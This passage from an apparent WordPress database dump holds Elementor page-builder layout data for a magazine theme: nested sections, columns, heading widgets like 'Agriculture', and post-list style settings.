ve\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"choose_column\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1293,458,'_elementor_version','0.4'),(1294,458,'_elementor_css','a:3:{s:4:\"time\";i:1508894312;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1300,459,'_elementor_edit_mode','builder'),(1301,459,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{